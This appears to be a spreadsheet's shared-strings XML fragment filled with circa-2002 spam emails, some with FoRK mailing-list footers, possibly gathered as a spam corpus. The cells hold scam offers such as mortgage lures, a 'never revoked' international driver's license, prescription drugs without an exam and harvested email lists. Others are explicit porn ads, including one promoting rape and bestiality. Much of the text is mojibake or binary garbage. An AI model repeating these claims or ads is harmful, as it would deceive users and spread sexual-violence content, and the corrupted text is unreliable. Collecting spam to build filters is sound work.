research firm. This report is based on The Wall Street Bulletinâ€™s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â€œforward-looking 
statementsâ€. Many factors could cause actual results to 
differ. Investors should consult with their Investment Advisor 
concerning IGTT. Copyright 2002 Â© The Wall Street Bulletin 
- All Rights Reserved
I no longer wish to receive your 
newsletter CLICK 
HEREikxrkobewgotpevemtbokjgssytdinm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</si>
  <si>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96l2
</t>
  </si>
  <si>
    <t xml:space="preserve"> (suddenlysusan@Stoolmail.zzn.com) on Tuesday, July 30, 2002 at 17:07:56
: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://002@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx009 Click to remove http://003@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
</t>
  </si>
  <si>
    <t xml:space="preserve">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DEMOEliminate or Reduce Travel ExpenseTry this on for savings... 
and turn those unnecessary trips into problem solving and fact finding conferences, 
saving time and wear and tear on your overworked business staff. To find out more about this revolutionary concept,
fill out the form below.
Required Input Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
All information given herein is strictly confidential and will not be re-distributed
      for any reason other than for the specific use intended.
To be removed from our distribution lists, please  
      Click 
      here..
</t>
  </si>
  <si>
    <t xml:space="preserve">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subject.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
FREEKY FUCKING SHIT!
This is the CRAZIEST this that i have ever seen!!
You will not believe your eyes.. and best of all it is 
FREE TO JOIN FOREVER!!
Just go to the site and enter your email that is all!HURRY they will not be doing this forever!!!
VERY GRAPHIC MATERIAL - MATURE AUDIENCE ONLY! 
You MUST be at least 18 years old to enter! 
This 
email was sent to you because your email address is part of a targeted opt-in 
list.You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t>
  </si>
  <si>
    <t xml:space="preserve">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now.Click_Herehttp://mamma.com/Search?evid=CE002333701a&amp;eng=Lycos&amp;cb=WebZone&amp;dest=http://211.167.74.101/mortg/
Sincerely,Chalres M. Gillette
MortCorp, LLClnqqbopolnujfmigjbfcittazhnnfxnmysspcmokdljxprdecawunewuumvjtpfnsbqwknqfkybbuvvnikbxcsnxdodgistybllysriqulpzvspiqkcbpjxvh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
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello
My name is Natalie. I live in St.Petersberg and I am looking
for a real relationship with a real man. I signed up with this internet
service to meet good western men -- I hope you are really there.
Please see and write me here if you like me
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Computer User 100670.3527 ,YOUR INTERNET USAGE IS BEING TRACKED
You have no privacy protection.
Will your BOSS, WIFE or KIDS find out?DOWNLOAD EZ INTERNET PRIVACY SOFTWARE+++++++++++++++++++++++++++++++++++++++++++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Â 
CLICK 
HERE
Â 
Â 
Â 
to be removed Click Here [IYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
 (balletscho@netcity.ru) on Wednesday, July 31, 2002 at 07:06:01
---------------------------------------------------------------------------: Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://006@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx002 Click to remove http://007@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">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7773yeFu0-048lhUU4192RRTa7-528LHHZ5390OFtY1-426ZJrY6257XgnL8-712daCw9024eVzQ8-819Sl77
</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</si>
  <si>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Now!!!If above link doesn't work, Click Here
Â 
4793sXmk4-211VDMv8083PWKO2-994pZZJ6881Xl37
</t>
  </si>
  <si>
    <t xml:space="preserve">INTEREST RATES HAVE JUST BEEN CUT!!!
NOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. 
http://www3.all-savings.com/refi/
Easy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!
---------------------------------------
To unsubscribe, go to: 
http://www3.all-savings.com/stopthemailplease/
Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@netnoteinc.comHuman Growth Hormone Therapy
Lose weight while building lean muscle massand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it's Guaranteed!
Lose WeightBuild Muscle ToneReverse Aging
Increased LibidoDuration Of Penile ErectionHealthier Bones
Improved MemoryImproved skinNew Hair GrowthWrinkle Disappearance 
Visit 
  Our Web Site and Learn The Facts : Click HereOR 
  Here  You are receiving this email as a subscriber
  to the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">ç¨¿ä»¶ï¼šé‡Žè›®å¥³å‹VSã€Šé­”é¬¼è‹±è¯­ã€‹
â€101æ•™è‚²ç½‘â€œæŽ¨èã€Šé­”é¬¼è‹±è¯­ã€‹
â€ä¸­å›½æ•™è‚²ç½‘â€œæŽ¨èã€Šé­”é¬¼è‹±è¯­ã€‹ 
ç¨¿ä»¶ï¼šå¦‚ä½•é—ª(FLASH)çš„æ›´é…·ä¸€ç‚¹
ç¨¿ä»¶ï¼šé‡Žè›®å¥³å‹å–œæ¬¢ä¸­å›½é…·å“¥
ç¨¿ä»¶ï¼šé‡Žè›®å¥³å‹å–œæ¬¢éº»è¾£é…·å“¥
ç¨¿ä»¶ï¼šeæ—¶ä»£ï¼Œé—ªå®¢ä¸æ•Œé…·å®¢
ç¨¿ä»¶ï¼šã€ŠFlashé…·å­—é›†ã€‹&amp;ã€Šé­”é¬¼è‹±è¯­ã€‹
ã€ŠFlashé…·å­—é›†ã€‹"å²ä¸Šæœ€å¼ºä¹‹æ•°å­—åŒ–ä¸­æ–‡å¼•æ“Ž"
ã€Šé­”é¬¼è‹±è¯­ã€‹"ä¸ç”¨å­¦è¯­æ³• ä¸ç”¨èƒŒå•è¯"åˆä¸­ç”Ÿä¹Ÿèƒ½çœ‹è‹±è¯­åŽŸç‰ˆâ€œå¤§ç‰‡â€ï¼
          çœ‹ã€Šæ˜Ÿçƒå¤§æˆ˜ã€‹ï¼Œå­¦ã€Šé­”é¬¼è‹±è¯­ã€‹ï¼
=====================================
ã€ŠFlashé…·å­—é›†ã€‹"å²ä¸Šæœ€å¼ºä¹‹æ•°å­—åŒ–ä¸­æ–‡å¼•æ“Ž"ã€€ã€€ã€ŠFlashé…·å­—é›†ã€‹ åˆåã€Šä¸­åŽå¤§å­—åº“ã€‹Flashç‰ˆï¼Œæ˜¯ã€Šä¸­åŽå¤§å­—åº“ã€‹çš„æœ€æ–°ç‰ˆæœ¬ï¼Œç³»ç”±ä¸­å›½å‘æ˜Žåä¼šä¼šå‘˜ä½•æµ·ç¾¤å…ˆç”ŸåŽ†æ—¶åå¹´ï¼Œè€—èµ„å·¨å¤§å®Œæˆçš„ä¸€å¥—è¶…å¤§åž‹ä¸­æ–‡ä¸ªæ€§åŒ–æ•°ç å­—åº“ï¼Œè¢«èª‰ä¸ºâ€œå²ä¸Šæœ€å¼ºä¹‹æ•°å­—åŒ–ä¸­æ–‡å¼•æ“Žâ€ã€‚
ã€€ã€€æœ€æ–°æŽ¨å‡ºçš„ã€ŠFlashé…·å­—é›†ã€‹å…±æ”¶å½•äº†1000åƒå¤šå¥—TRUETYPEä¸­æ–‡å­—åž‹ï¼Œæ˜¯ç›®å‰å…¨çƒé¦–å¥—çªç ´â€œåƒå¥—â€å­—åž‹å¤§å…³çš„æ•°å­—åŒ–ä¸­æ–‡ç”µè„‘å­—åº“ï¼Œä¹Ÿæ˜¯å”¯ä¸€èƒ½å¤Ÿæä¾›åƒå¥—çº§è§£å†³æ–¹æ¡ˆçš„ä¸­æ–‡ä¸ªæ€§åŒ–ç³»ç»Ÿå¹³å°ï¼Œæ˜¯â€œeæ—¶ä»£â€æ‹“å±•ç”µå­å•†åŠ¡é¦–é€‰çš„ä¸­æ–‡å¹³å°ã€‚
ã€€ã€€åœ¨é•¿è¾¾åå¹´çš„ç ”å‘è¿‡ç¨‹å½“ä¸­ï¼Œæœ‰å…³æŠ€æœ¯äººå‘˜å…‹æœç§ç§å›°éš¾ï¼Œåˆ›å»ºäº†ä¸€æ•´å¥—ç³»ç»ŸåŒ–ã€ç§‘å­¦åŒ–çš„ä¸­æ–‡æ±‰å­—å½¢æ€ç ”ç©¶ç†è®ºã€æ•°å­¦æ¨¡åž‹åŠå®žç”¨æ–¹æ¡ˆï¼Œå¹¶å»ºæˆå…¨çƒé¦–ä¸ªè¶…å¤§åž‹çš„æ±‰å­—å½¢æ€çŸ¥è¯†åº“ï¼Œæ€»å®¹é‡è¶…è¿‡600Gï¼Œæ˜¯ç›®å‰å…¨çƒæœ€å¤§çš„ä¸­æ–‡æ±‰å­—å½¢æ€çŸ¥è¯†åº“ã€‚
ã€€ â€œå¹¿å‘Šä¸šå¯¹å­—åž‹è¦æ±‚æžä¸¥ï¼Œé™¤ä¼ ç»Ÿå­—åž‹å¤–ï¼Œæ›´å¤šçš„æ˜¯éœ€è¦æ–°æ¬¾æ‰‹å†™åž‹åŠå„ç±»ç‰¹ç§å­—åž‹ã€‚â€
ã€€ ã€Šä¸­åŽå¤§å­—åº“ã€‹æä¾›äº†å¤§é‡åŽŸåˆ›ã€åŠåŽŸåˆ›"æ–°æ¬¾æ‰‹å†™åž‹"åŠå„ç±»"ç‰¹ç§å­—åž‹"ï¼Œä¾‹å¦‚ï¼šè‚ ä»”ä½“ã€åˆšå¤ä½“ã€å‰ªçº¸ä½“ã€æœ¨åˆ»ä½“ã€çŸ³å°ä½“ã€è‚¥ä»”ä½“ã€é¡½ç«¥ä½“ã€å¯Œè´µä½“ã€è‰èŽ“ä½“ã€æ•°ç ä½“ã€â€¦â€¦ã€ç­‰ç­‰ã€‚æ˜¯ç½‘ç»œå…¬å¸ã€å¹¿å‘Šè¡Œä¸šåŠä¸“ä¸šè®¾è®¡å¸ˆçš„é¦–é€‰ä¸ªæ€§åŒ–ä¸­æ–‡å¹³å°åˆ›ä½œå¹³å°ã€‚
ã€€ ç›®å‰ï¼Œåœ¨å¸‚åœºä¸Šå·²ç»å•†å“åŒ–çš„ä¸­æ–‡truetypeå­—åž‹å½“ä¸­ï¼Œ90%ç³»ç”±ã€Šä¸­åŽå¤§å­—åº“ã€‹æä¾›ï¼Œå…¨éƒ¨æ˜¯åŽŸåˆ›åŠåŠåŽŸåˆ›å­—åž‹ï¼Œç‹¬å®¶äº«æœ‰å…¨éƒ¨çŸ¥è¯†äº§æƒã€‚  =====================================
   ã€Šé­”é¬¼è‹±è¯­ã€‹
ã€€ã€€ã€Šé­”é¬¼è‹±è¯­ã€‹,åŽŸåå«â€œçªç ´è‹±è¯­â€ï¼Œè‹±æ–‡åç§°å«â€œeEnglishâ€ï¼Œæ˜¯ä¸€ç§æ³¨é‡å®žæ•ˆçš„è‹±è¯­è‡ªä¿®è¯¾ç¨‹ã€‚
ã€€ã€€ã€Šé­”é¬¼è‹±è¯­ã€‹ä»¥å…¶"ä¸ç”¨å­¦è¯­æ³• ä¸ç”¨èƒŒå•è¯"çš„æ˜“å­¦ç‰¹ç‚¹ï¼Œå’Œåˆä¸­ç”Ÿä¹Ÿèƒ½çœ‹è‹±è¯­åŽŸç‰ˆâ€œå¤§ç‰‡â€çš„å¼ºå¤§æ•ˆèƒ½ï¼Œè¿…é€Ÿæˆä¸ºç¬¬ä¸‰ä»£ä½“éªŒå¼è‹±è¯­æŠ€èƒ½å­¦ä¹ çš„é¦–é€‰æ–¹æ¡ˆï¼Œå¹¶å—åˆ°â€101æ•™è‚²ç½‘â€œã€â€ä¸­å›½æ•™è‚²ç½‘â€œçš„å…±åŒæŽ¨èã€‚ 
ã€€ã€€ ã€Šé­”é¬¼è‹±è¯­ã€‹çš„å­¦ä¹ å¼ºåº¦å’Œå­¦ä¹ æ•ˆèƒ½æ˜¯æ™®é€šè‹±è¯­è§†å¬æ•™æçš„ä¸‰å€ã€‚ç›®å‰ã€Šé­”é¬¼ è‹±è¯­ã€‹å·²å…·å¤‡è¶…è¿‡2000Mçš„åŒè¯­é˜…è¯»ææ–™å’Œè¿‘50ä¸‡å°æ—¶çš„MP3æœ‰å£°æ•™æ.æ›´å¤šèµ„æ–™ï¼Œè¯·æµè§ˆâ€œé…·å®¢å¤©ä¸‹â€ç½‘ç«™
=====================================
=  
=  ä¸»åŠ›ç«™ç‚¹ï¼šhttp://www.eChinaEdu.com
=  é•œåƒç«™ç‚¹ï¼šhttp://www.eChinaEdu.vicp.net
=  è®ºå›ç«™ç‚¹ï¼šhttp://qlong2008.xilubbs.com
=  
=====================================http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Cell Booster Antenna
USA Today says "The must have of the New millenium"NBC's Dateline says "If you want a clear sound then this penny $ item can save you minutes in Clarity"
BOOST 
        Your Reception
on 
        any cell phone or cordless
Â 
300% More Clarity!
Don't 
              buy another phone because of bad recepiton.
              Improve your communication instantly by
              simply installing this small chip.
Powerful Reception Booster
              Save 70%... As Seen On T.V.!
No 
              other product compares!
Ultra-thin and transparent
Installs in a second!
Power of a 4ft antenna!
No more dropped or interrupted calls
Work any place your singal may be weak!
Advertised on T.V. for over 3 times the price.
Click 
              Here Now
"...it was so easy to 
              install..."
1810Bjui2-440aPRY0870NWHC9-972kOhi7655OulA3-413l44
</t>
  </si>
  <si>
    <t xml:space="preserve">
MyDiscountSoftware
Â 
Â 
Â 
MyDiscountSoftware,
Inc.
Â 
They
have the lowest software prices you will ever see!
Â 
Inventory
closeout sale.Â  This week only.Adobe
          Photoshop 6.0Â  79.99!
Microsoft
          Office 2000Â  69.99!
QuickBooks
          ProÂ  59.99!
Microsoft
          Windows MEÂ  49.99!Value
          Package - Get All 4 TitlesÂ 
          149.99xnchsuwjfbuyygweqq
</t>
  </si>
  <si>
    <t xml:space="preserve">H1 { } TD {  FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif } P {  FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif } Â Compare Now Online + Save! Dear Homeowner,"Now is the time to take advantage of falling interest rates!Â There is no advantage in waiting any longer."Refinance or consolidate high interest credit card debt into a low interest mortgage.Â  Mortgage interest is tax deductible, whereas credit card interest is not.You can save thousands of dollars over the course of your loan with just a 0.25% drop in your rate!Our nationwide network of lenders have hundreds of different loan programs to fit your current situation: RefinanceSecond MortgageDebt ConsolidationHome ImprovementPurchaseÂ "Let us do the shopping for you...IT IS FREE!CLICK HERE"Please CLICK HERE to fill out a quick form. Your request will be transmitted to our network of mortgage specialists who will respond with up to three independent offers.This service is 100% free to home owners and new home buyers without any obligation.Data Flow National AveragesProgramRate30Year Fixed6.375%15Year Fixed5.750%5Year Balloon5.250%1/1Arm4.250%5/1Arm5.625%FHA30 Year Fixed6.500%VA 30 Year Fixed6.500%"You did all the shopping for me. Thank you!-T N. Cap.Beach, CA"...You helped me finance a new home and I got a very good deal.- R H. H.Beach, CA"..it was easy, and quick...!-V S. N.P.Beach, WA 
</t>
  </si>
  <si>
    <t xml:space="preserve">[Sorry for Multiple Copies of This Message. Welcome to CWC02 in China]Dear wireless colleagues:By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year.China is so far the world's largest wireless market, and the most
potential business partner in the coming several years. To get involved
in this huge business, 2002 China Wireless Congress is the best platform
which focuses on the following issues:1.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EventsIn addition, this congress will be together with the famous West-Lake
Expo'2002, and really a best combination of business and leisure in
Hangzhou - the most beautiful city of China.To join this professional gathering, please visit the website at:
http://delson.org/cwc02 or http://china.wirelesscongress.comThis 2002 China Wireless Congress will be very busy, please register
ASAP before the door is closed. For more information about this congress
or about Hangzhou,etc, please also check the website.On behalf of the congress committee, welcome to Hangzhou, the garden of
Shanghai !Thank you.Hangzhou Office of CWC'2002
http://delson.org/cwc02
http://china.wirelesscongress.com[sorry for copy of this message, removal is automatically. This is for
conference information only, not for commercial sale. Thanks a lot!]
</t>
  </si>
  <si>
    <t xml:space="preserve">
smart shoppers click here
 for the best rates
Paying Too Much for Life Insurance?
      Click Here to Save 70% on Your Policy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for FREE.Compare your coverage...$250,000... 
as low as 
$6.50 
per month$500,000... 
as low as 
$9.50 
per month$1,000,000... 
as low as 
$15.50 
per month!
Get a FREE Instant QuotePrepare for your family's future
Compare the lowest prices from the top insurance companies in the nation
</t>
  </si>
  <si>
    <t xml:space="preserve">
New Web Technology
Mortgage Rates Slashed For 
      The Last Time!Let us help you get a new mortgage for up to 
      100% of your home valueLower your monthly payment! 
            Consolidate your debt! 
            Shorten the term of your loan! 
            Reduce your interest rate! 
National Average Mortgage 
      Rates Program
Rates30 Yr Fixed
6.50%15 Yr Fixed
6.25%1 Yr Arm
5.51%
Choose From Hundreds of 
            Loan Programs Like: Purchase Loans 
            Refinance 
            Debt Consolidation 
            Home Improvement 
            Interest Only Jumbo's 
            No Income Verification 
Fill Out This Simple 
            Form and We Will Compete For Your Business... 
Required Input Field*Name*
Address
City 
State*
Zip Code *
Buiness Phone*
Home Phone 
Best time to contact Morning Afternoon EveningTotal Loan Request 
Approx. Home Value
A consultant will contact you soon. 
        All information given 
            herein is strictly confidential and will not be re-distributed for 
            any reason other than for the specific use 
            intended.To be 
            removed from our distribution lists, please Click 
            here..</t>
  </si>
  <si>
    <t xml:space="preserve">We are offering you quality marketing lists which have been verified giving you a 90% delivery rate for your marketing campaign.The lists are downloadable along with free sending software. We are currently adding 500,000 new addresses for download each week.Please Call [USA] 303 889 5732 (24hr Recorded Information)
</t>
  </si>
  <si>
    <t xml:space="preserve">Kaliteli pornonun adresi: http://www.noseks.com
Binlerce porno resim ve film.
Yasanmis gerï¿½ek hikayeler.
Tï¿½rk ï¿½nlï¿½lerin kaï¿½amak ve gizli resimleri.
Adult oyunlar.
Telekizlar.
Hepsi http://www.noseks.com adresinde. sadece tiklayin
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½+,ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½ï¿½'ï¿½ï¿½ï¿½uï¿½ï¿½N_x0018_ï¿½ï¿½gï¿½ï¿½gï¿½rï¿½ï¿½ï¿½ï¿½_x001E_zH^jï¿½ï¿½ï¿½_x001B_mï¿½ï¿½ï¿½ï¿½_x0018_ï¿½ï¿½ ï¿½ï¿½ï¿½(ï¿½ï¿½_x001F_ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½rï¿½)zï¿½ï¿½jY&amp;j)bï¿½	bï¿½ï¿½ï¿½ï¿½ï¿½_x001C_ï¿½ï¿½^ï¿½ï¿½Zï¿½Oï¿½ï¿½ï¿½lï¿½ï¿½.ï¿½ï¿½ï¿½ï¿½ï¿½_x001E_ï¿½wï¿½ï¿½ï¿½iï¿½ï¿½ï¿½ï¿½+-ï¿½ï¿½(ï¿½ï¿½_x001E_~ï¿½ï¿½{ï¿½ï¿½ï¿½ï¿½bï¿½ï¿½?ï¿½+-ï¿½wï¿½ï¿½ï¿½ï¿½zï¿½(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
</t>
  </si>
  <si>
    <t xml:space="preserve">Pack Your Bags!Congratulations!
Official
        Notification
hpshum@hotmail.com
    You have been specially selected to register for a
    Florida/Bahamas vacation!You Will Enjoy:
8 days/ 7 Nights of 1st Class Accomodations
Valid for up to 4 travelers
Rental Car with
	unlimited mileage
Adult Casino Cruise
Great Florida Attractions!
Much Much More...
Click Here!
(limited Availability)Â 
Â 
Â 
Â 
Â 
To no longer receive this or any other offer from us, click here to unsubscribe. [BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t>Interested                8sMortgage Owners OnlyÂ 
5.875%
Â 
In
        The Business of Serving Your Mortgage needsÂ 
Â For More Than 50 Years
Â 
Â 1)
       Complete the form
2)
       SubmitÂ Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
3)
       Receive ApprovalÂ Â Â 
Â 
Any
       Questions
866-424-6986
Â Â 
Safe,
       Simple, And Sure.
Name: *
Contact Phone: *
State:Â  *
Credit Rating: 
Good (some lates)
Excellent (no lates)
Fair (collection)
Poor (bankruptcy)
*
Owed on 1st 
            Rate: %*
Owed on 2nd 
            Rate: %*
Home Value:*
Amount Requested:
            *
What would you
            like to do?Â 
        Department of National Banking for Home Loans
        of the United States.
Equal
        Housing LenderÂ Â© 2001Â  Prudential Mortgage Loan Search Corporation. All rights
        reserved.Remove</t>
  </si>
  <si>
    <t>Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! http://www3.all-savings.com/termlife/ 
Representing quality nationwide carriers. Act now!
---------------------------------------
To unsubscribe, go to: 
http://www3.all-savings.com/stopthemailplease/
Please allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t xml:space="preserve">
RoyalMeds
&lt;!--
  .LinkBlack{Text-Decoration: none; color:#000000; font-size:8pt; font-family: arial; font-weight: normal}
--&gt;RoyalMeds.com
your online pharmacy Â· www.royalmeds.com&gt; We offer the Absolute Lowest prices on FDA-approved medications.&gt; Medication prescribed by licensed U.S. Physicians and shipped via FedEx overnight delivery. &gt; Free Medical Consultation Available 24 hours... 7 Days a week! &gt; No Physical Exam Necessary. &gt; Featured Products include:
WEIGHT LOSS: MERIDIA, PHENTERMINE and XENICAL 
SEXUAL: VIAGRA 
SKIN CARE: RENOVA and RETIN-A 
STOP SMOKING: ZYBAN 
HAIR LOSS: PROPECIA 
HERPES: VALTREX and FAMVIR 
PAIN RELIEF: CELEBREX and CLARITIN Click here to see how RoyalMeds.com can help youhttp://www.royalmeds.comÂ Â Â Â Â Â Â Unsubscribe Information:
This email is intended to be a benefit to the recipient. If you would like to opt-out and not receive any more marketing information please click here . Your address will be removed within 24hrs. We sincerely apologize for any inconvenience.jiocdhkevgjeftbjegpaerthqftuuiofljey</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</si>
  <si>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bcollier
http://xent.com/mailman/listinfo/fork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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">see me naked Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">HARDCORE SEX
HOT GIRLS FUCKINGÂ  HARD!!!&lt;&lt; click here to see &gt;&gt;&lt;&lt; click here to see &gt;&gt;&lt;&lt; click here to see &gt;&gt;* Over 150,000 XXX Pictures
* 125,000+ Sex Videos
* 100's of LIVECams &amp; Shows
* Erotic Stories &amp; Adult Chat Rooms
* New Content Added Every
	Day!
Â 
Click Here to Enter
Â 
&lt;&lt; click here to see &gt;&gt;&lt;&lt; click here to see &gt;&gt;&lt;&lt; click here to see &gt;&gt;-----------------------------------------------------------------------------------------
This newsletter is not unsolicited. The email address has been subscribed to our mailing list. If you would like to stop receiving this newsletter, just click here to unsubscribe and we'll block your email address immediately.
</t>
  </si>
  <si>
    <t xml:space="preserve">Untitled Document
Thank you in advance for taking the time to 
      review this email. 
I am not selling anything. Allow our liquidation 
        service to convert your problem inventory into quick cash. Please contact 
        me right away if you have any of these and/or other data media available. 
        We are a leader in the industry for liquidation and recycling of these 
        materials. Our network of outlets for your EXCESS, 
        OVERSTOCKED, or SURPLUS 
        consumables allows us to provide the maximum amount of residual value 
        for your inventory - NEW and USED.
Product
Brand
Product
Brand
Super 
                  DLT
Any
9840
Any
4mm, 
                  150m, 125m 
Any
DC6525
Any
DLT 
                  IV 
Any
LTO
Ultrium
4mm, 
                  120m, 90m 
Name brands
DC9250
Any
DLT 
                  III &amp; XT
Quantum, Maxell, Fuji
1200' &amp; 2400' 
                  Reel
Tape any
3570 
IBM
8mm, 170m, 230m
AIT w/ chip, Mammoth
DLT 
                  Cleaning Tape 
Any
Optical Media 
                  5.2 GB or higher
Hewlett Packard, etc.
3590 
Imation, IBM
8mm, 112m
Maxell, Sony, Exabyte, Imation
TK70
Any
Zip &amp; Jaz
Any
 Your "junk" could turn into cash - 
      We pay for all shipping expenses. Just email your list of supplies to me 
      or any questions you may have, and you'll be contacted right away with a 
      bid. I can email or fax you a copy of our purchasing process to ensure your 
      transaction is handled efficiently and professionally - and that your payment 
      will be prompt and accurate! 
      Thank you again and I look forward to doing business with you in the future. 
Norm HuttonSD Pacific 
       If you are interested, please visit our website.This message is sent in compliance with the new e-mail 
        bill: SECTION 301, Paragraph (a)(2)(C) of s.1618. And also in compliance 
        with the proposed Federal legislation for commercial e-mail (H.R.4176 
        - SECTION 101Paragraph (e)(1)(A)) AND S. 1618 TITLE III SEC. 301. To be 
        removed from our mailing list, simply by replying this email with Subject: Remove. 
</t>
  </si>
  <si>
    <t>Come check out Meatdemons!!
These young starlets think they have a future sucking cock.
With Amazing Facials, Cum Shots, and Deep Throating action.
they just might.
Click here for our free 80 picture gallery!!
http://free10.meatdemons.com/free.htmlNo strings attached. I know everyones says that.
But it is true.</t>
  </si>
  <si>
    <t xml:space="preserve">creditfix                ...................................................................................................................                You can now access and clear up bad credit online,
                directly from the convienience of you own computer.
Watch 
                your credit daily with real time updates.
GET 
                THE INFORMATION YOU NEED TO QUICKLY &amp; EFFICIANTLY REMOVE NEGATIVE 
                CREDIT ITEMS FROM YOUR REPORT
. 
                CLICK HERE FOR MORE INFORMATION .
 ..................................................................................................................
Your email address was obtained from a purchased list, Reference # 1600-17800.Â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 
              Â© 2002 Web Credit Inc All Rights Reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Online Credit BreakthroughÂ Â Repair Your Credit Online!9VcdkLOkGPiRWsemJM1e3KoMv2wSFOC1xKMsYFlO4owGR2cg7LpmqKUBnN1wnhHi3cr5m7UEXUgThat's right - You can now access + clear up bad credit ONLINE  -Directly from the comfort + convienience of your computer!Watch your credit daily, with REAL TIME UPDATES Get the information you need quickly and efficently to remove negative credit items from your report!Click Here For More InformationThank you - The Web Credit (tm) Team! 9VcdkLOkGPiRWsemJM1e3KoMv2wSFOC1xKMsYFlO4owGR2cg7LpmqKUBnN1wnhHi3cr5m7UEXUg
</t>
  </si>
  <si>
    <t xml:space="preserve">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																																						http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear bevstar10 ,Rape Sex!CLICK HERE
=============================================================
Do you like sexy animals doing the wild thing? We have the super hot content on the Internet!
This is the site you have heard about. Rated the number one adult site three years in a row!
- Thousands of pics from hardcore fucking, and cum shots to pet on girl.
- Thousands videos
So what are you waiting for?CLICK HEREYOU MUST BE AT LEAST 18 TO ENTER!Â Â Â 
To not be on our "in house" address database
 CLICK HERE and you will eliminated from future mailings. [:KJ)_8J7B]
</t>
  </si>
  <si>
    <t xml:space="preserve">
Put these nasty sluts to the test! FREE Access!!HEAVY HARD and FREE!Nothing to loose!!  Click here, no membership required! It's FREENOTE:84221111000</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</si>
  <si>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remove http://www.cs220.com/mortgage/remove.html
562818141198765544433</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</si>
  <si>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steven
</t>
  </si>
  <si>
    <t xml:space="preserve">Untitled
We're receiving checks for $100's and $1,000's
             every month - Let me show you how you can EASILY 
do the EXACT same thing!
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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@netnoteinc.comHuman Growth Hormone Therapy
Lose weight while building lean muscle massand reversing the ravages of aging all at once.
 Remarkable discoveries about Human Growth Hormones (HGH) are changing the way we think about aging and weight loss.
Lose WeightBuild Muscle ToneReverse Aging
Increased LibidoDuration Of Penile ErectionHealthier Bones
Improved MemoryImproved skinNew Hair GrowthWrinkle Disappearance 
Visit 
  Our Web Site and Learn The Facts : Click HereOR 
  Here  You are receiving this email as a subscriber
  to the Opt-In America Mailing List. 
To remove yourself from all related maillists,just Click Here
</t>
  </si>
  <si>
    <t>INTERNATIONAL DRIVER'S LICENSENeed a new driver's license?Too many points or other trouble?Want a license that can never be suspended
or revoked?Want an ID for nightclubs or hotel check-in?Avoid tickets, fines, and mandatory driver's
education.Protect your privacy, and hide your identity.The United Nations gave you the privilege to
drive freely throughout the world! (Convention
on International Road Traffic of September 19,
1949 &amp; World Court Decision, The Hague,
Netherlands, January 21, 1958)Take advantage of your rights. Order a valid
International Driver's License that can never
be suspended or revoked.Confidentiality assured.CALL NOW!!!1-770-908-3949 We await your call seven days a week, 24 hours a day,
including Sundays and holidays.</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</si>
  <si>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markets.http://www.lotsonet.com/homeopp/We are a 14 year old Inc 500 company.  Are you 
willing to grow?  Are you ready to take on the
challenges of the future?  Than we want you!Simply click on the link below for free information!
No obligation whatsoever.http://www.lotsonet.com/homeopp/ To be removed from this list go to:www.lotsonet.com/homeopp/remove.html 
2495gLue9-854NylY5891OkqI6-520HIMn3235DLKg2-154GVph3949xtsk0-058CQGC1446EgIE8-750Cl77</t>
  </si>
  <si>
    <t>I know you want to look at pussyI know you want to look at pussy, but first you need to learnThe Truth about the adult industry:Get Into Paysite Free!If you take 2 minutes to read what I have to say you will have full accessto some of the largest membership sites for free.TRUTHA recent internet survey showed that almost 28 % of all the revenue generated on the internet today is from adult products &amp; websites. Making it the #1 product/service in demand on the internet.TRUTHYahoo conducted a adult internet survey that showed more than More than half of all adult surfers have paid up to $50 for a pay site membership. We wonder why? It is really easy to ge
